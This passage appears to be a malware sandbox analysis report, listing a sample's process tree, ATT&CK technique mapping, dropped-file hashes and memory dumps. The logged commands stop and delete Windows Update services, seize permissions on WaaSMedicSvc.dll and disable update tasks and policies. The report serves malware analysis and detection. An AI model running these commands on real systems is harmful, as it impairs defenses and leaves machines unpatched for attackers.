/Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1312

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:952

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:4784

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:2244

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:4824

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:4836

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:4032

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:4740

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies registry key
PID:4508

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:2900

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1012

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4848

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4320

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1804

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4952

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:5068

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:624

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:3560

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4792

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:3796

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:4896

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:3868

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:3176

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
PID:4844

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "dycqfudelnyzo"
4⤵
PID:3372

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows\services.exe
Filesize
2.0MB

MD5
79dbc1a54d33366681f1e926d565cad4

SHA1
907cf0ec6784bf140f9759d6931d3697da0fc229

SHA256
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0

SHA512
6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd

Download Submit
C:\Program Files\Windows\services.exe
Filesize
2.0MB

MD5
79dbc1a54d33366681f1e926d565cad4

SHA1
907cf0ec6784bf140f9759d6931d3697da0fc229

SHA256
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0

SHA512
6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
539B

MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
memory/624-385-0x0000000000000000-mapping.dmp

Download
memory/952-361-0x0000000000000000-mapping.dmp

Download
memory/1012-370-0x0000000000000000-mapping.dmp

Download
memory/1088-268-0x0000025CD79E0000-0x0000025CD79EA000-memory.dmp

Filesize
40KB

Download
memory/1088-235-0x0000025CD7BD0000-0x0000025CD7C89000-memory.dmp

Filesize
740KB

Download
memory/1088-229-0x0000025CD79F0000-0x0000025CD7A0C000-memory.dmp

Filesize
112KB

Download
memory/1088-211-0x0000000000000000-mapping.dmp

Download
memory/1312-360-0x0000000000000000-mapping.dmp

Download
memory/1648-172-0x0000000000000000-mapping.dmp

Download
memory/1804-382-0x0000000000000000-mapping.dmp

Download
memory/2136-179-0x0000000000000000-mapping.dmp

Download
memory/2160-176-0x0000000000000000-mapping.dmp

Download
memory/2244-363-0x0000000000000000-mapping.dmp

Download
memory/2784-169-0x0000000000000000-mapping.dmp

Download
memory/2792-181-0x0000000000000000-mapping.dmp

Download
memory/2900-369-0x0000000000000000-mapping.dmp

Download
memory/2952-128-0x0000000000000000-mapping.dmp

Download
memory/3052-173-0x0000000000000000-mapping.dmp

Download
memory/3172-186-0x0000000000000000-mapping.dmp

Download
memory/3176-391-0x0000000000000000-mapping.dmp

Download
memory/3236-192-0x0000000000000000-mapping.dmp

Download
memory/3348-185-0x0000000000000000-mapping.dmp

Download
memory/3372-401-0x0000019D2DC30000-0x0000019D2DC37000-memory.dmp

Filesize
28KB

Download
memory/3372-398-0x0000019D2DFC0000-0x0000019D2DFC6000-memory.dmp

Filesize
24KB

Download
memory/3380-189-0x0000000000000000-mapping.dmp

Download
memory/3456-174-0x0000000000000000-mapping.dmp

Download
memory/3460-381-0x00000243655E0000-0x00000243655F2000-memory.dmp

Filesize
72KB

Download
memory/3460-373-0x000002434CC50000-0x000002434CC56000-memory.dmp

Filesize
24KB

Download
memory/3472-170-0x0000000000000000-mapping.dmp

Download
memory/3472-371-0x0000000000000000-mapping.dmp

Download
memory/3476-193-0x0000000000000000-mapping.dmp

Download
memory/3560-386-0x0000000000000000-mapping.dmp

Download
memory/3692-180-0x0000000000000000-mapping.dmp

Download
memory/3796-388-0x0000000000000000-mapping.dmp

Download
memory/3816-195-0x0000000000000000-mapping.dmp

Download
memory/3868-390-0x0000000000000000-mapping.dmp

Download
memory/4032-366-0x0000000000000000-mapping.dmp

Download
memory/4288-191-0x0000000000000000-mapping.dmp

Download
memory/4320-380-0x0000000000000000-mapping.dmp

Download
memory/4484-182-0x0000000000000000-mapping.dmp

Download
memory/4492-194-0x0000000000000000-mapping.dmp

Download
memory/4508-368-0x0000000000000000-mapping.dmp

Download
memory/4580-184-0x0000000000000000-mapping.dmp

Download
memory/4628-197-0x0000000000000000-mapping.dmp

Download
memory/4656-210-0x0000000000000000-mapping.dmp

Download
memory/4700-141-0x0000010F52690000-0x0000010F5286D000-memory.dmp

Filesize
1.9MB

Download
memory/4700-121-0x0000010F6D000000-0x0000010F6D1DC000-memory.dmp

Filesize
1.9MB

Download
memory/4736-140-0x000002007BD10000-0x000002007BD86000-memory.dmp

Filesize
472KB

Download
memory/4736-135-0x0000020079A30000-0x0000020079A52000-memory.dmp

Filesize
136KB

Download
memory/4736-129-0x0000000000000000-mapping.dmp

Download
memory/4740-367-0x0000000000000000-mapping.dmp

Download
memory/4776-175-0x0000000000000000-mapping.dmp

Download
memory/4784-362-0x0000000000000000-mapping.dmp

Download
memory/4792-387-0x0000000000000000-mapping.dmp

Download
memory/4824-364-0x0000000000000000-mapping.dmp

Download
memory/4836-365-0x0000000000000000-mapping.dmp

Download
memory/4844-375-0x0000000000401BEA-mapping.dmp

Download
memory/4844-379-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/4844-374-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/4848-171-0x0000000000000000-mapping.dmp

Download
memory/4848-372-0x0000000000000000-mapping.dmp

Download
memory/4896-183-0x0000000000000000-mapping.dmp

Download
memory/4896-389-0x0000000000000000-mapping.dmp

Download
memory/4932-190-0x0000000000000000-mapping.dmp

Download
memory/4948-177-0x0000000000000000-mapping.dmp

Download
memory/4952-383-0x0000000000000000-mapping.dmp

Download
memory/5012-188-0x0000000000000000-mapping.dmp

Download
memory/5020-187-0x0000000000000000-mapping.dmp

Download
memory/5064-178-0x0000000000000000-mapping.dmp

Download
memory/5068-384-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads